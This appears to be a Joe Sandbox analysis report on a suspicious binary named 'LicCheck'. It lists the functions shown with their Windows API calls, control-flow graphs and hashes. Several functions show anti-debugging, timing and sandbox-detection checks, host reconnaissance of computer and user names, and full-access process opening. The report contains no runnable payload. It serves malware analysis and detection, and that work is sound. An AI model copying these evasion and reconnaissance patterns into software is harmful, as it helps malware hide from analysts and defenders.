                                                                                                      • Part of subcall function 00793B60: CreateFileA.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00793BF6
                                                                                                      • Part of subcall function 00793B60: DeviceIoControl.KERNELBASE(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00793C14
                                                                                                      • Part of subcall function 00793B60: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00793C47
                                                                                                      • Part of subcall function 00793F90: IsDebuggerPresent.KERNEL32(61DA755C,?,00000044), ref: 00793FBA
                                                                                                      • Part of subcall function 00793F90: GetModuleHandleW.KERNEL32(ntdll.dll,NtDelayExecution,?,00000044), ref: 00793FE7
                                                                                                      • Part of subcall function 00793F90: GetProcAddress.KERNEL32(00000000), ref: 00793FEE
                                                                                                      • Part of subcall function 00793F90: GetTickCount64.KERNEL32 ref: 00793FFA
                                                                                                      • Part of subcall function 00793F90: NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 00794016
                                                                                                      • Part of subcall function 00793F90: GetTickCount64.KERNEL32 ref: 00794018
                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,61DA755C), ref: 00794736
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,00000000), ref: 00794CC0
                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00794D03
                                                                                                    • GetUserNameA.ADVAPI32(?,000000FF), ref: 00794D17
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name$Count64FileModuleTick$AddressComputerControlCreateDebuggerDelayDeviceExecutionFolderGlobalHandleInfoMemoryPathPresentProcStatusSystemUnothrow_t@std@@@User__ehfuncinfo$??2@
                                                                                                    • String ID: P$Z}$Z}$Z}
                                                                                                    • API String ID: 3481597238-2017049980
                                                                                                    • Opcode ID: df1b754382d08038181ce945da0c44fa645fc77fde9f1904e4cf9c51d05489dc
                                                                                                    • Instruction ID: 3c1e13cfcd10064b967279f1b50d726406a53e386632bc41cd33670ad22b1c86
                                                                                                    • Opcode Fuzzy Hash: df1b754382d08038181ce945da0c44fa645fc77fde9f1904e4cf9c51d05489dc
                                                                                                    • Instruction Fuzzy Hash: 394226B19001688BDF29CB28DC98BEDBB75AF52304F5482D8D24867283E7385BC5CF59
                                                                                                    Function 00793F90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 59librarynativeloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 404 793f90-793fc2 IsDebuggerPresent 405 794029 404->405 406 793fc4-793fcb call 793d10 404->406 408 79402b-794045 call 7a53be 405->408 406->405 412 793fcd-793fd4 call 793c80 406->412 412->405 415 793fd6-793ff8 GetModuleHandleW GetProcAddress 412->415 416 793ffa-794023 GetTickCount64 NtDelayExecution GetTickCount64 415->416 417 794025-794027 415->417 416->405 416->417 417->408
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(61DA755C,?,00000044), ref: 00793FBA
                                                                                                      • Part of subcall function 00793F90: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,61DA755C), ref: 00793D42
                                                                                                      • Part of subcall function 00793F90: Process32FirstW.KERNEL32(00000000,?), ref: 00793D6B
                                                                                                      • Part of subcall function 00793F90: Process32NextW.KERNEL32(00000000,0000022C), ref: 00793D81
                                                                                                      • Part of subcall function 00793C80: CloseHandle.KERNELBASE(DEADBEEF,61DA755C), ref: 00793CBF
                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtDelayExecution,?,00000044), ref: 00793FE7
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00793FEE
                                                                                                    • GetTickCount64.KERNEL32 ref: 00793FFA
                                                                                                    • NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 00794016
                                                                                                    • GetTickCount64.KERNEL32 ref: 00794018
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Count64HandleProcess32Tick$AddressCloseCreateDebuggerDelayExecutionFirstModuleNextPresentProcSnapshotToolhelp32
                                                                                                    • String ID: NtDelayExecution$ntdll.dll
                                                                                                    • API String ID: 2350081285-521143355
                                                                                                    • Opcode ID: b2614b6752e34cdde690236994dfc7e453c055a9d83ce54b3f669525c08339b2
                                                                                                    • Instruction ID: 8905f274e679ec702200af4de6e40add8fa4abee2238d894e04e07148a68320d
                                                                                                    • Opcode Fuzzy Hash: b2614b6752e34cdde690236994dfc7e453c055a9d83ce54b3f669525c08339b2
                                                                                                    • Instruction Fuzzy Hash: E411A371A047059BDF109FB8AC49F6E77B8EB49711F000669EA11D3281EB3D95458AA4
                                                                                                    Function 00793B60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetSystemInfo.KERNELBASE(?), ref: 00793B7F
                                                                                                    • GlobalMemoryStatusEx.KERNELBASE(?), ref: 00793BA0
                                                                                                    • CreateFileA.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00793BF6
                                                                                                    • DeviceIoControl.KERNELBASE(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00793C14
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00793C47
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ControlCreateDeviceFileGlobalInfoMemoryStatusSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3398702251-2766056989
                                                                                                    • Opcode ID: 1da666cd7dec26083ba46b597491b311fa3b5cc37ae782ba1647cb6f9b0b1ae5
                                                                                                    • Instruction ID: cfcaffaccc687216459c7a9bd82e29cab6d68c06548bb8263244fd8b6326177e
                                                                                                    • Opcode Fuzzy Hash: 1da666cd7dec26083ba46b597491b311fa3b5cc37ae782ba1647cb6f9b0b1ae5
                                                                                                    • Instruction Fuzzy Hash: 4431A270608740ABEB20DB74DC4AF5FB7E8AFC9704F404A0CF299A61D1DB78A244C796
                                                                                                    Function 00798930 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 190COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 150 798930-798982 call 7a421d 153 7989b3-7989c0 150->153 154 798984-798993 call 7a421d 150->154 156 7989f2 153->156 157 7989c2-7989ca 153->157 163 7989a5-7989ad call 7a4275 154->163 164 798995-7989a0 154->164 158 7989f4-7989f8 156->158 157->158 160 7989cc-7989f1 call 7a4275 call 7a53be 157->160 161 798a0a-798a0c 158->161 162 7989fa-798a02 call 7a43fa 158->162 161->160 167 798a0e-798a13 161->167 162->167 175 798a04-798a07 162->175 163->153 164->163 171 798a19-798a30 call 7a53cc 167->171 172 798a15-798a17 167->172 179 798a3e 171->179 180 798a32-798a37 171->180 172->160 175->161 182 798a43-798a89 call 7a421d 179->182 181 798a39-798a3c 180->181 180->182 181->182 185 798b6a-798b74 call 7a41d0 182->185 186 798a8f-798a94 call 7a4500 182->186 189 798a99-798abb call 7a454b 186->189 193 798abd-798ac3 call 7ac9be 189->193 194 798ac6-798ad2 189->194 193->194 196 798add-798ae9 194->196 197 798ad4-798ada call 7ac9be 194->197 200 798aeb-798af1 call 7ac9be 196->200 201 798af4-798b00 196->201 197->196 200->201 202 798b0b-798b17 201->202 203 798b02-798b08 call 7ac9be 201->203 208 798b19-798b1f call 7ac9be 202->208 209 798b22-798b2e 202->209 203->202 208->209 212 798b39-798b65 call 7a4275 call 7a43ce 209->212 213 798b30-798b36 call 7ac9be 209->213 212->160 213->212
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00798966
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00798988
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 007989A8
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 007989CF
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00798A48
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00798A94
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00798AAE
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00798B43
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00798B50
                                                                                                      • Part of subcall function 007A41D0: std::invalid_argument::invalid_argument.LIBCONCRT ref: 007A41DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                                                                    • String ID: ,}$,}$bad locale name
                                                                                                    • API String ID: 1592514138-93938261
                                                                                                    • Opcode ID: aa1708593ec81a2a2feee62c87c97e527e78bc0719ebc6666475ae93bf26c8e4
                                                                                                    • Instruction ID: 56d337cab6b4e99a2e12ba66529f373e5ddfa11b005d7fde34af5d96d6c06b18
                                                                                                    • Opcode Fuzzy Hash: aa1708593ec81a2a2feee62c87c97e527e78bc0719ebc6666475ae93bf26c8e4
                                                                                                    • Instruction Fuzzy Hash: 61615FB1D01244DFDF50DFA4E845B9EBBB4BF86314F14451AE805AB342EB7DA904CB92
                                                                                                    Function 007C04D7 Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 418 7c04d7-7c0507 call 7c0225 421 7c0509-7c0514 call 7ae7e0 418->421 422 7c0522-7c052e call 7bb512 418->422 427 7c0516-7c051d call 7ae7f3 421->427 428 7c0547-7c0590 call 7c0190 422->428 429 7c0530-7c0545 call 7ae7e0 call 7ae7f3 422->429 438 7c07fc-7c0800 427->438 436 7c05fd-7c0606 GetFileType 428->436 437 7c0592-7c059b 428->437 429->427 443 7c064f-7c0652 436->443 444 7c0608-7c0639 GetLastError call 7ae799 CloseHandle 436->444 441 7c059d-7c05a1 437->441 442 7c05d2-7c05f8 GetLastError call 7ae799 437->442 441->442 447 7c05a3-7c05d0 call 7c0190 441->447 442->427 445 7c065b-7c0661 443->445 446 7c0654-7c0659 443->446 444->427 455 7c063f-7c064a call 7ae7f3 444->455 450 7c0665-7c06b3 call 7bb45d 445->450 451 7c0663 445->451 446->450 447->436 447->442 461 7c06b5-7c06c1 call 7c039f 450->461 462 7c06d2-7c06fa call 7bff42 450->462 451->450 455->427 461->462 469 7c06c3 461->469 467 7c06fc-7c06fd 462->467 468 7c06ff-7c0740 462->468 470 7c06c5-7c06cd call 7b3873 467->470 471 7c0761-7c076f 468->471 472 7c0742-7c0746 468->472 469->470 470->438 474 7c07fa 471->474 475 7c0775-7c0779 471->475 472->471 473 7c0748-7c075c 472->473 473->471 474->438 475->474 478 7c077b-7c07ae CloseHandle call 7c0190 475->478 481 7c07b0-7c07dc GetLastError call 7ae799 call 7bb625 478->481 482 7c07e2-7c07f6 478->482 481->482 482->474
                                                                                                    APIs
                                                                                                      • Part of subcall function 007C0190: CreateFileW.KERNELBASE(?,00000000,?,007C0580,?,?,00000000,?,007C0580,?,0000000C), ref: 007C01AD
                                                                                                    • GetLastError.KERNEL32 ref: 007C05EB
                                                                                                    • __dosmaperr.LIBCMT ref: 007C05F2
                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 007C05FE
                                                                                                    • GetLastError.KERNEL32 ref: 007C0608
                                                                                                    • __dosmaperr.LIBCMT ref: 007C0611
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 007C0631
                                                                                                    • CloseHandle.KERNEL32(?), ref: 007C077E
                                                                                                    • GetLastError.KERNEL32 ref: 007C07B0
                                                                                                    • __dosmaperr.LIBCMT ref: 007C07B7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                    • String ID:
                                                                                                    • API String ID: 4237864984-0
                                                                                                    • Opcode ID: 00ad208fd8d349850fd566466ee0a2a28deeb049576ef818f6cca88b5614f5b5
                                                                                                    • Instruction ID: cc2246a291cb4667dde2dae0b7800ed79ab8e10f7db14d7d7553d8a7616c3d8a
                                                                                                    • Opcode Fuzzy Hash: 00ad208fd8d349850fd566466ee0a2a28deeb049576ef818f6cca88b5614f5b5
                                                                                                    • Instruction Fuzzy Hash: C5A10232A14159DFCF199F68DC55FAE3BB1AF46320F24015EF811EB291CA399862CBD1
                                                                                                    Function 007B6C6D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 487 7b6c6d-7b6c7d 488 7b6c7f-7b6c92 call 7ae7e0 call 7ae7f3 487->488 489 7b6c97-7b6c99 487->489 505 7b7005 488->505 491 7b6c9f-7b6ca5 489->491 492 7b6fed-7b6ffa call 7ae7e0 call 7ae7f3 489->492 491->492 495 7b6cab-7b6cd7 491->495 510 7b7000 call 7a9def 492->510 495->492 498 7b6cdd-7b6ce6 495->498 501 7b6ce8-7b6cfb call 7ae7e0 call 7ae7f3 498->501 502 7b6d00-7b6d02 498->502 501->510 503 7b6fe9-7b6feb 502->503 504 7b6d08-7b6d0c 502->504 509 7b7008-7b700b 503->509 504->503 508 7b6d12-7b6d16 504->508 505->509 508->501 512 7b6d18-7b6d2f 508->512 510->505 516 7b6d31-7b6d34 512->516 517 7b6d74-7b6d7a 512->517 520 7b6d43-7b6d49 516->520 521 7b6d36-7b6d3e 516->521 518 7b6d4b-7b6d62 call 7ae7e0 call 7ae7f3 call 7a9def 517->518 519 7b6d7c-7b6d83 517->519 555 7b6f20 518->555 522 7b6d87-7b6da5 call 7b3ae9 call 7b3705 * 2 519->522 523 7b6d85 519->523 520->518 525 7b6d67-7b6d72 520->525 524 7b6df4-7b6e07 521->524 559 7b6dc2-7b6dea call 7b7213 522->559 560 7b6da7-7b6dbd call 7ae7f3 call 7ae7e0 522->560 523->522 529 7b6e0d-7b6e19 524->529 530 7b6ec3-7b6ecc call 7be037 524->530 527 7b6df1 525->527 527->524 529->530 533 7b6e1f-7b6e21 529->533 540 7b6ece-7b6ee0 530->540 541 7b6f3d 530->541 533->530 537 7b6e27-7b6e48 533->537 537->530 543 7b6e4a-7b6e60 537->543 540->541 545 7b6ee2-7b6ef1 GetConsoleMode 540->545 548 7b6f41-7b6f57 ReadFile 541->548 543->530 547 7b6e62-7b6e64 543->547 545->541 550 7b6ef3-7b6ef7 545->550 547->530 552 7b6e66-7b6e89 547->552 553 7b6f59-7b6f5f 548->553 554 7b6fb5-7b6fc0 GetLastError 548->554 550->548 557 7b6ef9-7b6f11 ReadConsoleW 550->557 552->530 561 7b6e8b-7b6ea1 552->561 553->554 556 7b6f61 553->556 562 7b6fd9-7b6fdc 554->562 563 7b6fc2-7b6fd4 call 7ae7f3 call 7ae7e0 554->563 558 7b6f23-7b6f2d call 7b3705 555->558 566 7b6f64-7b6f76 556->566 567 7b6f13 GetLastError 557->567 568 7b6f32-7b6f3b 557->568 558->509 559->527 560->555 561->530 573 7b6ea3-7b6ea5 561->573 569 7b6f19-7b6f1f call 7ae799 562->569 570 7b6fe2-7b6fe4 562->570 563->555 566->558 576 7b6f78-7b6f7c 566->576 567->569 568->566 569->555 570->558 573->530 580 7b6ea7-7b6ebe 573->580 582 7b6f7e-7b6f8e call 7b6987 576->582 583 7b6f95-7b6fa2 576->583 580->530 594 7b6f91-7b6f93 582->594 588 7b6fae-7b6fb3 call 7b67df 583->588 589 7b6fa4 call 7b6ade 583->589 595 7b6fa9-7b6fac 588->595 589->595 594->558 595->594
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID: 0-3907804496
                                                                                                    • Opcode ID: 982e7879c729909a91c5fefbf265d9d789066e43a97d8e6a4e10001e1614cd35
                                                                                                    • Instruction ID: f5817129b2d753a065ca738de5254da2796619d86e14dd436fce198e49989a41
                                                                                                    • Opcode Fuzzy Hash: 982e7879c729909a91c5fefbf265d9d789066e43a97d8e6a4e10001e1614cd35
                                                                                                    • Instruction Fuzzy Hash: 28B1C0B5A04249EFDB15DFA8D884BFDBBB1BF85310F148159E6009B292CB7C9D41CB60
                                                                                                    Function 00794350 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 240COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 007984A0: std::locale::_Init.LIBCPMT ref: 00798532
                                                                                                      • Part of subcall function 00797570: std::locale::_Init.LIBCPMT ref: 007975C2
                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,61DA755C), ref: 00794551
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00794615
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 007946C1
                                                                                                      • Part of subcall function 00798930: std::_Lockit::_Lockit.LIBCPMT ref: 00798966
                                                                                                      • Part of subcall function 00798930: std::_Lockit::_Lockit.LIBCPMT ref: 00798988
                                                                                                      • Part of subcall function 00798930: std::_Lockit::~_Lockit.LIBCPMT ref: 007989A8
                                                                                                      • Part of subcall function 00798930: std::_Lockit::~_Lockit.LIBCPMT ref: 007989CF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Lockitstd::_$InitIos_base_dtorLockit::_Lockit::~_std::ios_base::_std::locale::_$OpenProcess
                                                                                                    • String ID: X$p}
                                                                                                    • API String ID: 2479089509-1639695909
                                                                                                    • Opcode ID: ead78b185be1b5713fc1710dae01fc8458caeab3ebb74067340aedab5605780c
                                                                                                    • Instruction ID: c0b7818d60a95a7c8a5eb3e7b5606247d3e6ca31506570d151d547ccea82017c
                                                                                                    • Opcode Fuzzy Hash: ead78b185be1b5713fc1710dae01fc8458caeab3ebb74067340aedab5605780c
                                                                                                    • Instruction Fuzzy Hash: CAA11B70900259DFDB20CF64D948B9DBBB4FF45304F1485AAE40ABB391D7B9AA85CF90
                                                                                                    Function 007AFEDD Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(8B56C18B,?,007AFED7,00000016,007A9BF2,?,8B56C18B,61DA755C,007A9BF2,8B56C18B), ref: 007AFEEE
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,007AFED7,00000016,007A9BF2,?,8B56C18B,61DA755C,007A9BF2,8B56C18B), ref: 007AFEF5
                                                                                                    • ExitProcess.KERNEL32 ref: 007AFF07
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 300930541eea2d5f9620d500687c4d0d30874a50a22db40e8e252417e1a42f79
                                                                                                    • Instruction ID: f77ad3cedf4b6b426133bd28fcf4821f3196fb2bb1dff55ee424dd02479e394e
                                                                                                    • Opcode Fuzzy Hash: 300930541eea2d5f9620d500687c4d0d30874a50a22db40e8e252417e1a42f79
                                                                                                    • Instruction Fuzzy Hash: 0AD09E31004509FFCF112FA0DC0DD4D3F29AF86355754C124F94A95131CF7AA9D19B94
                                                                                                    Function 007B3505 Relevance: 3.2, APIs: 2, Instructions: 191fileCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 671 7b3505-7b3524 672 7b352a-7b352c 671->672 673 7b36fe 671->673 674 7b3558-7b357e 672->674 675 7b352e-7b354d call 7a9d72 672->675 676 7b3700-7b3704 673->676 678 7b3580-7b3582 674->678 679 7b3584-7b358a 674->679 684 7b3550-7b3553 675->684 678->679 680 7b358c-7b3596 678->680 679->675 679->680 682 7b3598-7b35a3 call 7b7253 680->682 683 7b35a6-7b35b1 call 7b3052 680->683 682->683 689 7b35f3-7b3605 683->689 690 7b35b3-7b35b8 683->690 684->676 691 7b3607-7b360d 689->691 692 7b3656-7b3676 WriteFile 689->692 693 7b35ba-7b35be 690->693 694 7b35dd-7b35f1 call 7b2c18 690->694 695 7b360f-7b3612 691->695 696 7b3644-7b3654 call 7b30d0 691->696 699 7b3678-7b367e GetLastError 692->699 700 7b3681 692->700 697 7b36c6-7b36d8 693->697 698 7b35c4-7b35d3 call 7b2fea 693->698 710 7b35d6-7b35d8 694->710 703 7b3632-7b3642 call 7b3294 695->703 704 7b3614-7b3617 695->704 721 7b362d-7b3630 696->721 705 7b36da-7b36e0 697->705 706 7b36e2-7b36f4 697->706 698->710 699->700 702 7b3684-7b368f 700->702 711 7b36f9-7b36fc 702->711 712 7b3691-7b3696 702->712 703->721 704->697 713 7b361d-7b3628 call 7b31ab 704->713 705->673 705->706 706->684 710->702 711->676 717 7b3698-7b369d 712->717 718 7b36c4 712->718 713->721 722 7b369f-7b36b1 717->722 723 7b36b6-7b36bf call 7ae7bc 717->723 718->697 721->710 722->684 723->684
                                                                                                    APIs
                                                                                                      • Part of subcall function 007B2C18: GetConsoleOutputCP.KERNEL32(61DA755C,00000000,00000000,00000000), ref: 007B2C7B
                                                                                                    • WriteFile.KERNELBASE(?,00000000,?,007D4240,00000000,0000000C,00000000,00000000,?,00000000,007D4240,00000010,007AC6A2,00000000,00000000,00000000), ref: 007B366E
                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 007B3678
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 2915228174-0
                                                                                                    • Opcode ID: 3f10bb1481d5fbf884c28960b5bbfd0a6993a12d14747b40d618632f8907e721
                                                                                                    • Instruction ID: 0dae62fae0c94d24bff3b481d4e0b247dad392eadd9b930da1686b4a28664b48
                                                                                                    • Opcode Fuzzy Hash: 3f10bb1481d5fbf884c28960b5bbfd0a6993a12d14747b40d618632f8907e721
                                                                                                    • Instruction Fuzzy Hash: D361B3B1D04149BFDF218FA8C889FEEBFB9AF19308F144145E814A7252D739DA95CB60
                                                                                                    Function 00795500 Relevance: 3.2, APIs: 2, Instructions: 171COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
